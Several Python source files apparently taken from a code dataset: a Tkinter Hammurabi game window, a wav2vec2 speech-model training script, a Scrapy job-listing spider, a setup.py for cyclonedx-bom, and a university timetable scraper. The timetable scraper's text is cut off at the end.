GoPlay(self.gameWindow, self.master, self.currentRuler.get())\r\n \r\n def close_windows(self):\r\n self.master.destroy()\r\n\r\nclass GoPlay:\r\n '''Class to run the Hammurabi game in a window.'''\r\n def __init__(self, master, parent, ruler_name):\r\n global BUY\r\n global SELL\r\n self.master = master\r\n self.parent = parent\r\n try:\r\n rulerTerm = int(float(ruler_name.split('#')[1]))\r\n except:\r\n rulerTerm = 10\r\n self.Ruler = Hammurabi.Ruler(ruler_name.split('#')[0], rulerTerm)\r\n \r\n self.master.protocol(\"WM_DELETE_WINDOW\", self.close_windows)\r\n self.master.geometry('x'.join((str(WIN_W),str(WIN_H))))\r\n self.master.minsize(340, 250)\r\n self.master.maxsize(500,600)\r\n \r\n # History Window will keep a running total of actions and results\r\n # Be sure red 'X' doesn't destroy the window!\r\n self.historyWin = tk.Toplevel(self.master)\r\n self.historyWin.title(\"{}'s Record as Ruler\".format(self.Ruler.name))\r\n self.historyWin.protocol(\"WM_DELETE_WINDOW\", self.historyWin.withdraw)\r\n self.historyWin.geometry('x'.join((str(WIN_W+65),str(WIN_H-265))))\r\n self.historyWin.minsize(WIN_W+50, WIN_H-320)\r\n self.historyWin.maxsize(500,600)\r\n hist_head = ('\\t\\t\\t ----- G R A I N -----'+\r\n '\\nYear\\tPop\\tAcres\\tStored\\t Fed \\tHarvest'+\r\n '\\n----\\t---\\t-----\\t------\\t-----\\t-------')\r\n \r\n # Set up some string variables to use as active labels\r\n self.yio = tk.StringVar() #years in office\r\n self.pop = tk.StringVar() #population\r\n self.grn = tk.StringVar() #grain in storage\r\n self.acr = tk.StringVar() #acres owned\r\n self.ppa = tk.StringVar() #price per acres\r\n self.plt = tk.StringVar() #amount to plant\r\n self.plt.set('0')\r\n self.hist = tk.StringVar() #text for running history window\r\n self.hist.set(hist_head)\r\n \r\n self.update_labels()\r\n \r\n self.bs = tk.IntVar() # value state for buying / selling land\r\n self.bs.set(BUY) # BUY is +1, SELL is -1 to increase or decrease acreage\r\n \r\n self.oracle_text = tk.StringVar() # Message to be displayed in bottom frame\r\n self.oracle_text.set(Hammurabi.welcome(to_print=False))\r\n \r\n default_font = tkFont.nametofont(\"TkDefaultFont\")\r\n default_font.configure(size=10)\r\n \r\n # top frame for data output\r\n self.frame_top = tk.LabelFrame(self.master, \r\n width = WIN_W, height = 150,\r\n text = \"Ruler: \"+self.Ruler.name,\r\n ) \r\n # middle frame for entry fields\r\n self.frame_mid = tk.LabelFrame(self.master,\r\n width = WIN_W, height = 200,\r\n text = \"Make your commands:\"\r\n ) \r\n \r\n # bottom frame for report message \r\n self.frame_bot = tk.LabelFrame(self.master,\r\n width = WIN_W, height = 300,\r\n text = \"Message from Oracle:\") \r\n \r\n self.frame_top.pack(side=tk.TOP, padx=5, pady=5, fill=tk.BOTH, expand=False)\r\n self.frame_mid.pack(side=tk.TOP, padx=5, pady=5, fill=tk.BOTH, expand=False)\r\n self.frame_bot.pack(side=tk.TOP, padx=5, pady=5, fill=tk.BOTH, expand=False)\r\n \r\n \r\n # Fill in Top frame, then put items\r\n self.lbl_years = tk.Label(self.frame_top, text = \"Years Served:\")\r\n self.val_years = tk.Label(self.frame_top, textvar = self.yio)\r\n self.lbl_pop = tk.Label(self.frame_top, text = \"Population:\")\r\n self.val_pop = tk.Label(self.frame_top, textvar = self.pop)\r\n self.lbl_grain = tk.Label(self.frame_top, text = \"Bushels of Grain:\")\r\n self.val_grain = tk.Label(self.frame_top, textvar = self.grn)\r\n self.lbl_acres = tk.Label(self.frame_top, text = \"Acres of Land:\")\r\n self.val_acres = tk.Label(self.frame_top, textvar = self.acr)\r\n \r\n\r\n self.lbl_years.grid(row=0, column=0, sticky = tk.E)\r\n self.val_years.grid(row=0, column=1, sticky = tk.W)\r\n self.lbl_grain.grid(row=0, column=2, sticky = tk.E)\r\n self.val_grain.grid(row=0, column=3, sticky = tk.W)\r\n self.lbl_pop.grid(row=1, column=0, sticky = tk.E)\r\n self.val_pop.grid(row=1, column=1, sticky = tk.W)\r\n self.lbl_acres.grid(row=1, column=2, sticky = tk.E)\r\n self.val_acres.grid(row=1, column=3, sticky = tk.W)\r\n \r\n # Fill in Middle frame:\r\n self.lbl_landcost = tk.Label(self.frame_mid, text = \"Price of land in bushels per acre:\")\r\n self.val_landcost = tk.Label(self.frame_mid, textvar = self.ppa)\r\n \r\n self.rbn_buy = tk.Radiobutton(self.frame_mid, text=\"Buy\", var=self.bs, value=BUY, command = self.bs_range)\r\n self.rbn_sell = tk.Radiobutton(self.frame_mid, text=\"Sell\", var=self.bs, value=SELL, command = self.bs_range)\r\n maxval = int(self.Ruler.bushels_in_storage / self.Ruler.price_of_land)\r\n self.val_landsale = tk.Spinbox(self.frame_mid, width=5, from_=0, to=maxval, command = self.bs_range)\r\n self.sale_validation = self.frame_mid.register(self.validate_sale)\r\n self.val_landsale.config(validate='all', validatecommand = (self.sale_validation, '%P'))\r\n self.lbl_landsale = tk.Label(self.frame_mid, text=\"acres\")\r\n \r\n self.lbl_feed = tk.Label(self.frame_mid, text=\"Feed the people \")\r\n self.val_feed = tk.Spinbox(self.frame_mid, width=5, from_=0, to=self.grn.get(), increment=5, repeatinterval=20, command = self.bs_range)\r\n self.digit_validation = self.frame_mid.register(self.validate_digit)\r\n self.val_feed.config(validate='all', validatecommand = (self.digit_validation, '%P','%W'))\r\n self.lbl_feed2 = tk.Label(self.frame_mid, text=\"bushels of grain\")\r\n \r\n self.lbl_plant = tk.Label(self.frame_mid, text=\"Plant \")\r\n self.val_plant = tk.Spinbox(self.frame_mid, textvar = self.plt, width=5, from_=0, to=self.get_plant_max(), command = self.bs_range)\r\n self.val_plant.config(validate='all', validatecommand = (self.digit_validation, '%P','%W'))\r\n self.lbl_plant2 = tk.Label(self.frame_mid, text=\"acres\")\r\n \r\n self.goButton = tk.Button(self.frame_mid, \r\n text = ' GO ', \r\n width = 8,\r\n activebackground='green',\r\n highlightcolor='green',\r\n cursor='hand2',\r\n command = self.go_action\r\n )\r\n \r\n self.quitButton = tk.Button(self.frame_mid, \r\n text = 'End', \r\n width = 8,\r\n activebackground='red',\r\n highlightcolor='red',\r\n cursor='hand2',\r\n command = self.close_windows\r\n )\r\n \r\n self.lbl_landcost.grid(row=0, column=0, columnspan = 4, sticky = tk.E + tk.N)\r\n self.val_landcost.grid(row=0, column=4, sticky = tk.W + tk.N)\r\n self.rbn_buy.grid(row=1, column=0, sticky=tk.W)\r\n self.rbn_sell.grid(row=1, column=1, sticky=tk.W)\r\n self.val_landsale.grid(row=1, column=2, sticky=tk.W)\r\n self.lbl_landsale.grid(row=1, column=3, sticky=tk.W)\r\n self.lbl_feed.grid(row=2, column=0, columnspan=2, sticky=tk.E)\r\n self.val_feed.grid(row=2, column=2, sticky=tk.W)\r\n self.lbl_feed2.grid(row=2, column=3, columnspan=2, sticky=tk.W)\r\n self.lbl_plant.grid(row=3, column=0, columnspan=2, sticky=tk.E)\r\n self.val_plant.grid(row=3, column=2, sticky=tk.W)\r\n self.lbl_plant2.grid(row=3, column=3, sticky=tk.W)\r\n self.goButton.grid(row=4, column=4, sticky=tk.E, padx=5, pady=5)\r\n self.quitButton.grid(row=4, column=5, sticky=tk.E, padx=5, pady=5)\r\n \r\n\r\n # Fill in Bottom frame:\r\n self.lbl_oracle_msg = tk.Label(self.frame_bot, \r\n textvariable = self.oracle_text,\r\n fg = '#40f',\r\n wraplength=400,\r\n font=('TkDefaultFont',8),\r\n justify=tk.LEFT\r\n )\r\n \r\n self.lbl_oracle_msg.grid(row=0, column=0, sticky=tk.N+tk.W)\r\n \r\n # Set up History Window with a frame and text for hist variable\r\n self.label_hist = tk.Label(self.historyWin, \r\n text = \"History for Ruler: \"+self.Ruler.name,\r\n font = ('TkDefaultFont',15)\r\n )\r\n hist_font = tkFont.nametofont('TkFixedFont')\r\n self.hist_text_area = scrolledtext.ScrolledText(self.historyWin,\r\n width = 50,\r\n height = 10,\r\n font = hist_font,\r\n )\r\n self.hist_text_area.insert('end',self.hist.get())\r\n self.historyWin.grid_columnconfigure(0,weight=1)\r\n self.historyWin.grid_rowconfigure(1,weight=1)\r\n self.historyWin.resizable(width = True, height = True)\r\n self.label_hist.grid(column=0,row=0, padx=10, pady=10, sticky=tk.W)\r\n self.hist_text_area.grid(column=0, row=1, padx=10, pady=10, sticky=tk.W+tk.N+tk.E+tk.S)\r\n self.hist_text_area.configure(state=\"disabled\")\r\n self.historyWin.withdraw()\r\n\r\n # Create a menu so user can pull up the History Window\r\n self.menubar = tk.Menu(self.master)\r\n self.filemenu = tk.Menu(self.menubar,tearoff=0)\r\n self.filemenu.add_command(label=\"View History\", command=self.historyWin.deiconify)\r\n self.filemenu.add_command(label=\"Quit Reign\", command=self.close_windows)\r\n self.filemenu.add_command(label=\"Quit Game\", command=self.parent.destroy)\r\n self.helpmenu = tk.Menu(self.menubar,tearoff=0)\r\n self.helpmenu.add_command(label=\"Help\", command=self.show_reign_help)\r\n self.menubar.add_cascade(label=\"File\", menu=self.filemenu)\r\n self.menubar.add_cascade(label=\"Help\", menu=self.helpmenu)\r\n self.master.config(menu=self.menubar)\r\n \r\n \r\n\r\n def show_reign_help(self):\r\n self.reignHelpWin = tk.Toplevel(self.master)\r\n self.reignHelpWin.title(\"Rules...\")\r\n self.historyWin.geometry('x'.join((str(WIN_W),str(WIN_H-265))))\r\n self.historyWin.minsize(WIN_W, WIN_H-265)\r\n self.historyWin.maxsize(WIN_W, WIN_H-265)\r\n self.playHelpLbl = tk.Label(self.reignHelpWin, text = Hammurabi.welcome(to_print=False)).pack(padx=5,pady=5)\r\n \r\n def close_windows(self):\r\n self.master.destroy()\r\n self.parent.deiconify()\r\n \r\n \r\n def update_labels(self):\r\n self.yio.set('{:3d}'.format(self.Ruler.years_ruled)) #years in office\r\n self.pop.set(self.Ruler.population) #population\r\n self.grn.set(self.Ruler.bushels_in_storage) #grain in storage\r\n self.acr.set(self.Ruler.acres_of_land) #acres owned\r\n self.ppa.set(self.Ruler.price_of_land) #price per acres\r\n # yio pop acr grn fed harvest\r\n hist_line = \"\\n{:3}\\t{:5}\\t{:5}\\t{:6}\\t{!s:5}\\t{!s:5}\".format(self.yio.get(),self.pop.get(),self.acr.get(),self.grn.get(),self.Ruler.bushels_fed, (self.Ruler.harvested_bushels_per_acre*self.Ruler.acres_planted))\r\n \r\n self.hist.set(self.hist.get() + hist_line)\r\n \r\n def update_history_text(self):\r\n self.hist_text_area.configure(state=\"normal\")\r\n self.hist_text_area.replace(1.0,'end',self.hist.get())\r\n self.hist_text_area.configure(state=\"disabled\")\r\n \r\n def bs_range(self):\r\n # set land sale limits accordingly, ignore feed and plant\r\n if self.bs.get() == BUY:\r\n maxval = int(int(self.grn.get()) / int(self.ppa.get()))\r\n else:\r\n maxval = int(self.acr.get())\r\n self.val_landsale.config(to=maxval)\r\n \r\n # set feed limits accordingly, ignore plant\r\n try:\r\n maxval = int(self.grn.get()) - (int(self.bs.get()) * int(self.val_landsale.get()) * int(self.ppa.get()))\r\n if maxval <= 0:\r\n #self.val_feed.set('0')\r\n self.val_feed.config(to=0)\r\n else:\r\n self.val_feed.config(to=maxval)\r\n except ValueError:\r\n pass\r\n \r\n # set planting limits\r\n tmp = self.get_plant_max()\r\n if tmp == 0:\r\n self.plt.set('0')\r\n self.val_plant.config(to=tmp)\r\n \r\n \r\n def get_plant_max(self):\r\n # the max allowed to plant is the least of \r\n # 1. population * 10\r\n # 2. acres owned (+/- current sale)\r\n # 3. (total bushels available * 2 acres / bushel ) where total is storage +/- sale - feed\r\n m1 = int(self.pop.get()) * 10\r\n try:\r\n m2 = int(self.acr.get()) + (int(self.bs.get()) * int(self.val_landsale.get()))\r\n except:\r\n m2 = m1\r\n try:\r\n tot_grn = int(self.grn.get()) - (int(self.bs.get())*int(self.val_landsale.get())*int(self.ppa.get())) - int(self.val_feed.get())\r\n m3 = tot_grn * 2\r\n except:\r\n m3 = m1\r\n \r\n return max(0,min(m1,m2,m3))\r\n \r\n \r\n def validate_sale(self, user_input):\r\n # first, make sure scrollbox limits are up to date:\r\n self.bs_range()\r\n # ensure input is number\r\n if user_input.isdigit():\r\n minval = int(self.frame_mid.nametowidget(self.val_landsale).config('from')[4])\r\n maxval = int(self.frame_mid.nametowidget(self.val_landsale).config('to')[4])\r\n \r\n if int(user_input) not in range(minval,maxval+1):\r\n return False\r\n return True\r\n \r\n elif user_input is \"\":\r\n return True\r\n \r\n else:\r\n return False\r\n \r\n \r\n def validate_digit(self, user_input, W):\r\n # first, make sure scrollbox limits are up to date:\r\n self.bs_range()\r\n if user_input.isdigit():\r\n minval = int(self.frame_mid.nametowidget(W).config('from')[4])\r\n maxval = int(self.frame_mid.nametowidget(W).config('to')[4])\r\n\r\n if int(user_input) not in range(minval,maxval+1):\r\n return False\r\n return True\r\n \r\n elif user_input is \"\":\r\n return True\r\n else:\r\n return False\r\n \r\n\r\n def final_check(self):\r\n msg = None\r\n # check that there is no blank entry\r\n if self.val_landsale.get()=='' or self.val_feed.get()=='' or self.plt.get()=='':\r\n msg = 'O great {}, please make sure each item has a value!'.format(self.Ruler.name)\r\n return msg\r\n cashOnHand = int(self.grn.get())\r\n # check land sale\r\n ## Is there enough acreage to sell?\r\n ## Is there enough bushels to pay?\r\n if self.bs.get() == BUY:\r\n if cashOnHand < (int(self.ppa.get()) * int(self.val_landsale.get())):\r\n msg = 'O great {}, you do not have enough grain to buy {} acres.'.format(self.Ruler.name, self.val_landsale.get())\r\n return msg\r\n cashOnHand -= int(self.ppa.get()) * int(self.val_landsale.get())\r\n else:\r\n if int(self.acr.get()) < int(self.val_landsale.get()):\r\n msg = 'O great {}, you do not have enough land to sell {} acres.'.format(self.Ruler.name, self.val_landsale.get())\r\n return msg\r\n cashOnHand += int(self.ppa.get()) * int(self.val_landsale.get())\r\n # check feed\r\n ## Is there enough bushels to feed?\r\n if cashOnHand < int(self.val_feed.get()):\r\n msg = 'O great {}, you do not have enough grain to feed {} bushels.'.format(self.Ruler.name, self.val_feed.get())\r\n return msg\r\n cashOnHand -= int(self.val_feed.get())\r\n # check planting\r\n ## Is there enough land to plant\r\n ## Is there enough seed to plant\r\n ## Is population enough to plant\r\n if (int(self.acr.get()) + (int(self.bs.get()) * int(self.val_landsale.get()))) < int(self.plt.get()):\r\n msg = 'O great {}, you do not have enough land to plant {} acres.'.format(self.Ruler.name, self.plt.get())\r\n elif (int(self.grn.get()) * 2) < int(self.grn.get()):\r\n msg = 'O great {}, you do not have enough grain to plant {} acres.'.format(self.Ruler.name, self.plt.get())\r\n elif (int(self.pop.get()) * 10) < int(self.plt.get()):\r\n msg = 'O great {}, you do not have enough people to plant {} acres.'.format(self.Ruler.name, self.plt.get())\r\n return msg\r\n \r\n def go_action(self):\r\n #msg = \"You hit the GO button\\nLand Exchange: {}\\nFeed: {}\\nPlant: {}\".format(str(int(self.val_landsale.get())*int(self.bs.get())),self.val_feed.get(),self.plt.get())\r\n #self.oracle_text.set(msg)\r\n \r\n self.lbl_oracle_msg.config(font=('TkDefaultFont',10))\r\n \r\n msg = self.final_check()\r\n if msg != None:\r\n self.oracle_text.set(msg+'\\n')\r\n return\r\n \r\n # Obviously passed final check\r\n # Process all the calls for the year in office\r\n self.Ruler.exchange_land(int(self.bs.get()) * int(self.val_landsale.get()))\r\n\r\n self.Ruler.feed_people(int(self.val_feed.get()))\r\n \r\n self.Ruler.plant_seed(int(self.plt.get()))\r\n \r\n if not self.Ruler.update_population():\r\n # update_pop returns False if you starved too many\r\n self.oracle_text.set(self.Ruler.impeach(quiet=True))\r\n self.end_reign()\r\n \r\n self.Ruler.update_harvest()\r\n self.Ruler.update_land_price()\r\n self.Ruler.years_ruled += 1\r\n \r\n # Update the \"dashboard\" values and\r\n # Reset the choices back to 0's\r\n self.update_labels()\r\n self.update_history_text()\r\n self.re_init_vals()\r\n \r\n # set the appropriate text, which depends on \r\n # if still in office or not.\r\n if self.Ruler.in_office:\r\n if int(self.yio.get()) < self.Ruler.term:\r\n msg = self.summarize_year()\r\n self.oracle_text.set(msg)\r\n else: \r\n msg = self.Ruler.print_final_summary(mode='return')\r\n msg += '\\n'+self.get_final_score()\r\n self.oracle_text.set(msg)\r\n self.end_reign()\r\n else:\r\n self.end_reign()\r\n \r\n def re_init_vals(self):\r\n self.bs.set(BUY)\r\n self.val_landsale.delete(0,tk.END)\r\n self.val_landsale.insert(0,'0')\r\n self.val_feed.delete(0,tk.END)\r\n self.val_feed.insert(0,'0')\r\n self.val_plant.delete(0,tk.END)\r\n self.val_plant.insert(0,'0')\r\n \r\n \r\n def summarize_year(self):\r\n return self.Ruler.print_summary(mode='return')\r\n \r\n \r\n def get_final_score(self):\r\n avg_starve_rate = self.Ruler.percentage_death_rate\r\n avg_land_wealth = self.Ruler.acres_of_land / self.Ruler.population\r\n \r\n if ((avg_starve_rate > 33) or (avg_land_wealth < 7)):\r\n return self.Ruler.impeach_message\r\n elif ((avg_starve_rate > 10) or (avg_land_wealth < 9)):\r\n return self.Ruler.bad_message\r\n elif ((avg_starve_rate > 3) or (avg_land_wealth < 10)):\r\n return self.Ruler.so_so_message\r\n else:\r\n return self.Ruler.great_message\r\n\r\n \r\n \r\n def end_reign(self):\r\n # Disable all the widgets, especially \"GO\" button\r\n # Setting the oracle_text is not the responsibility of this function!\r\n self.parent.bell()\r\n self.goButton.config(state=tk.DISABLED)\r\n\r\ndef main(): \r\n random.seed()\r\n root = tk.Tk()\r\n app = Welcome(root)\r\n root.mainloop()\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"Hammurabi_win.pyw","file_name":"Hammurabi_win.pyw","file_ext":"pyw","file_size_in_byte":23186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"328714079","text":"from src.DataCollatorCTCWithPadding import DataCollatorCTCWithPadding\nfrom src.Audio_Processor import Audio_Processor\nfrom transformers import Wav2Vec2ForCTC\nfrom transformers import TrainingArguments\nfrom datasets import load_metric,load_from_disk\nimport numpy as np\nfrom transformers import Trainer\nimport torch\nimport os\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\"\ntorch.cuda.set_device(torch.device('cuda:0'))\nprocessor_save_path = './processor'\ndatasets_path = './training_data'\naudio_processor = Audio_Processor(processor_save_path=processor_save_path)\ndata_collator = DataCollatorCTCWithPadding(processor=audio_processor.processor, padding=True)\nwer_metric = load_metric(\"wer\")\n\ndef load_datasets(datasets_path):\n train_datasets = load_from_disk(os.path.join(datasets_path,'train_datasets.ds'))\n test_datasets = load_from_disk(os.path.join(datasets_path, 'test_datasets.ds'))\n return train_datasets,test_datasets\n\ndef compute_metrics(pred):\n\n pred_logits = pred.predictions\n pred_ids = np.argmax(pred_logits, axis=-1)\n\n pred.label_ids[pred.label_ids == -100] = audio_processor.processor.tokenizer.pad_token_id\n\n pred_str = audio_processor.processor.batch_decode(pred_ids)\n # we do not want to group tokens when computing the metrics\n label_str = audio_processor.processor.batch_decode(pred.label_ids, group_tokens=False)\n\n wer = wer_metric.compute(predictions=pred_str, references=label_str)\n\n return {\"wer\": wer}\n\n\ndef remove_long_common_voicedata(dataset, max_seconds=6):\n dftest = dataset.to_pandas()\n dftest['len'] = dftest['input_values'].apply(len)\n maxLength = max_seconds * 16000\n dftest = dftest[dftest['len'] < maxLength]\n dftest = dftest.drop('len', 1)\n dataset = dataset.from_pandas(dftest)\n del dftest\n return dataset\n\n\nif __name__ == '__main__':\n train_datasets, test_datasets = load_datasets(datasets_path=datasets_path)\n train_datasets = remove_long_common_voicedata(train_datasets)\n test_datasets = remove_long_common_voicedata(test_datasets)\n\n model = Wav2Vec2ForCTC.from_pretrained(\n \"facebook/wav2vec2-large-xlsr-53\",\n attention_dropout=0.1,\n hidden_dropout=0.1,\n feat_proj_dropout=0.0,\n mask_time_prob=0.05,\n layerdrop=0.1,\n gradient_checkpointing=True,\n ctc_loss_reduction=\"mean\",\n pad_token_id=audio_processor.processor.tokenizer.pad_token_id,\n vocab_size=len(audio_processor.processor.tokenizer)\n )\n\n training_args = TrainingArguments(\n output_dir=\"./train_model/wav2vec2-large-xlsr-zh_TW-8K-demo\",\n group_by_length=False,\n per_device_train_batch_size=1,\n gradient_accumulation_steps=1,\n evaluation_strategy=\"steps\",\n eval_accumulation_steps= 1,\n num_train_epochs=30,\n fp16=True,\n save_steps=400,\n eval_steps=400,\n logging_steps=400,\n learning_rate=3e-4,\n warmup_steps=500,\n save_total_limit=2,\n )\n\n trainer = Trainer(\n model=model,\n data_collator=data_collator,\n args=training_args,\n compute_metrics=compute_metrics,\n train_dataset=train_datasets,\n eval_dataset=test_datasets,\n tokenizer=audio_processor.feature_extractor,\n )\n import gc\n gc.collect()\n torch.cuda.empty_cache()\n trainer.train()","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"560703514","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSaintMediaJP spider created on the top of ATSSpider\n\nscrapy crawl saintmedia_jp -a mining_job_id=9999 -a iteration=1 -a extract=1 -a url=\"http://www.saintmedia.co.jp/work/area.html\"\n\nSample URL:\n http://www.saintmedia.co.jp/work/area.html\n\"\"\"\n\nfrom re import compile\nfrom scrapy.http import Request\nfrom scrapy.selector import Selector\nfrom urlparse import urljoin\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import HtmlFormatter, NormalizedJoin, Prefix\n\npattern = {\n 'ref_id': compile(r'detail-(\\d+)\\.'),\n}\n\n\nclass SaintMediaJP(ATSSpider):\n\n name = 'saintmedia_jp'\n logo_url = ''\n\n def parse(self, response):\n sel = Selector(response)\n # logo url\n if not self.logo_url:\n logo_url = sel.xpath(\n '//div[@id=\"headLogo\"]/a/img/@src'\n ).extract()\n if logo_url:\n self.logo_url = urljoin(response.url, logo_url[0])\n\n \"\"\" Selecting all states \"\"\"\n state_hrefs = sel.xpath(\n '//div[@id=\"search_dotbar\"]/dl[@id=\"area\"]/dd/a/@href'\n ).extract()\n for state_href in state_hrefs:\n yield Request(\n callback=self.parse_state,\n url=urljoin(response.url, state_href)\n )\n\n def parse_state(self, response):\n sel = Selector(response)\n \"\"\" Selecting all cities \"\"\"\n city_hrefs = sel.xpath(\n '//ul[@id=\"pref\"]/li/a/@href'\n ).extract()\n for city_href in city_hrefs:\n yield Request(\n callback=self.parse_jobs_list,\n url=urljoin(response.url, city_href)\n )\n\n def parse_jobs_list(self, response):\n sel = Selector(response)\n \"\"\"\n parse all jobs list and call details page\n \"\"\"\n for href in sel.xpath(\n '//div[@id=\"list_wrap\"]/div[@id=\"list_area\"]/div[@id=\"list_ttl\"]/p/a/@href'\n ).extract():\n yield Request(\n callback=self.parse_job_callback(),\n url=urljoin(response.url, href)\n )\n\n next_page = sel.xpath(\n '//div[@id=\"pager\"]/ul/li/span/../following-sibling::li[1]/a/@href'\n ).extract()\n if next_page:\n yield Request(\n callback=self.parse_jobs_list,\n url=urljoin(response.url, next_page[0])\n )\n\n def parse_job(self, response):\n \"\"\"\n Extract all required information.\n \"\"\"\n sel = Selector(response)\n\n loader = BrightcorpItemLoader(selector=sel)\n\n loader.add_xpath(\n 'title',\n '//div[@id=\"detail_area\"]/div[@id=\"detail_ttl\"]/p/text()'\n )\n loader.add_xpath(\n 'location',\n '//tr/th[contains(text(), \"%s\")]/following-sibling::td[1]/text()' % unicode('勤務地', 'utf-8')\n )\n loader.add_value(\n 'referencenumber',\n response.url,\n Prefix('%s-' % self.name),\n re=pattern['ref_id']\n )\n loader.add_value('url', response.url)\n loader.add_xpath(\n 'description',\n '//tr[th[contains(text(), \"%s\")]]' % unicode('お仕事内容', 'utf-8'),\n HtmlFormatter()\n )\n loader.add_xpath(\n 'jobtype',\n '//tr/th[contains(text(), \"%s\")]/following-sibling::td[1]/text()' % unicode('雇用形態', 'utf-8')\n )\n loader.add_xpath(\n 'baseSalary',\n '//tr/th[contains(text(), \"%s\")]/following-sibling::td[1]/text()' % unicode('給与', 'utf-8')\n )\n loader.add_xpath(\n 'workhours',\n '//tr/th[contains(text(), \"%s\")]/following-sibling::td[1]//text()' % unicode('勤務日/時間', 'utf-8'),\n NormalizedJoin(' ')\n )\n loader.add_xpath(\n 'qualifications',\n '//tr[th[contains(text(), \"%s\")]]' % unicode('応募資格', 'utf-8'),\n HtmlFormatter()\n )\n loader.add_xpath(\n 'benefits',\n '//tr[th[contains(text(), \"%s\")]]' % unicode('待遇', 'utf-8'),\n HtmlFormatter()\n )\n loader.add_xpath(\n 'other',\n '//tr[th[contains(text(), \"%s\")]]' % unicode('その他', 'utf-8'),\n HtmlFormatter()\n )\n loader.add_value('logo_url', self.logo_url)\n loader.add_value('apply_url', response.url)\n\n yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/saintmedia_jp.py","file_name":"saintmedia_jp.py","file_ext":"py","file_size_in_byte":4538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"350539332","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\nimport os.path\n\nfrom setuptools import setup, find_packages\n\nscript_path = os.path.dirname(__file__)\n\nsetup(\n name='cyclonedx-bom',\n version=open(os.path.join(script_path, 'VERSION')).read(),\n url='https://github.com/CycloneDX/cyclonedx-python',\n author='Steve Springett',\n author_email='steve.springett@owasp.org',\n maintainer='Steve Springett',\n maintainer_email='steve.springett@owasp.org',\n description='CycloneDX Software Bill of Materials (SBOM) generation utility',\n long_description=open(os.path.join(script_path, 'README.md')).read(),\n long_description_content_type=\"text/markdown\",\n keywords=[\"BOM\", \"SBOM\", \"SCA\", \"OWASP\"],\n license='Apache-2.0',\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Developers',\n 'Intended Audience :: Information Technology',\n 'Intended Audience :: Legal Industry',\n 'Intended Audience :: System Administrators',\n 'Topic :: Security',\n 'Topic :: Software Development',\n 'Topic :: System :: Software Distribution',\n 'License :: OSI Approved :: Apache Software License',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8',\n 'Programming Language :: Python :: 3.9'\n ],\n packages=find_packages(),\n python_requires='>=3.6',\n data_files=[('', ['README.md', 'requirements.txt', 'requirements-test.txt', 'VERSION'])],\n install_requires=open(os.path.join(script_path, 'requirements.txt')).read(),\n entry_points={\n 'console_scripts': [\n 'cyclonedx-py=cyclonedx_py.client:main'\n ]\n },\n zip_safe=False\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"19788884","text":"# from bs4 import BeautifulSoup\nimport requests\nimport random\nfrom datetime import datetime\nfrom datetime import timedelta\n\n\ndef get_date(day):\n\n if day == 'today':\n\n return datetime.today().strftime(\"%d.%m.%Y\")\n\n else:\n\n today_day = datetime.today()\n\n start = today_day - timedelta(days=today_day.weekday())\n choosen_day = start + timedelta(days=day)\n return choosen_day.strftime(\"%d.%m.%Y\")\n\n\ndef get_schedule_dict(day):\n\n date = get_date(day)\n\n url = 'https://www.chsu.ru/raspisanie'\n\n r = requests.post(url, data=get_body(date),\n headers=get_headers(), params=get_params()) # params=get_params())\n\n try:\n return r.json()\n except:\n\n print('Something went wrong!')\n\n\ndef get_body(date):\n\n body = '_TimeTable_WAR_TimeTableportlet_cmd=timeTable&_TimeTable_WAR_TimeTableportlet_typeTimeTable=period&_TimeTable_WAR_TimeTableportlet_group=7%D0%AD%D0%91-01-51%D0%BE%D0%BF&_TimeTable_WAR_TimeTableportlet_semester=1+%D1%81%D0%B5%D0%BC%D0%B5%D1%81%D1%82%D1%80+2016%2F2017&_TimeTable_WAR_TimeTableportlet_type=student&_TimeTable_WAR_TimeTableportlet_startDate=' + \\\n date+'&_TimeTable_WAR_TimeTableportlet_endDate=' + \\\n date # &_TimeTable_WAR_TimeTableportlet_professor=3741'\n\n return body\n\n\ndef get_headers():\n\n headers = {'Sec-Fetch-Mode': 'cors',\n 'Sec-Fetch-Site': 'same-origin',\n 'Origin': 'https://www.chsu.ru',\n 'Accept-Encoding': 'gzip, deflate, br',\n 'Accept-Language': 'ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7',\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36',\n 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',\n 'Accept': '*/*',\n 'Referer': 'https://www.chsu.ru/raspisanie',\n 'X-Requested-With': 'XMLHttpRequest',\n 'Connection': 'keep-alive'}\n\n return headers\n\n\ndef get_params():\n\n params = {'p_p_id': 'TimeTable_WAR_TimeTableportlet',\n 'p_p_lifecycle': '2',\n 'p_p_state': 'normal',\n 'p_p_mode': 'view',\n 'p_p_cacheability': 'cacheLevelPage',\n 'p_p_col_id': 'column-1',\n 'p_p_col_count': '1',\n }\n\n return params\n\n\ndef get_text(data):\n\n result = ''\n for i in data.get('response')['items']:\n\n time = str(i.get('time'))\n aud = str(i.get('audience'))\n prof_name = str(i.get('professor')['name'])\n disc = str(i.get('discipline'))\n\n result = result + (time+' | '+disc+' | '+aud+' | '+prof_name) + '\\n'\n\n return result if result != '' else 'нет пар'\n\n\ndef get_schedule(day):\n\n return get_text(get_schedule_dict(day))\n\n\n# if __name__ == '__main__':\n\n# 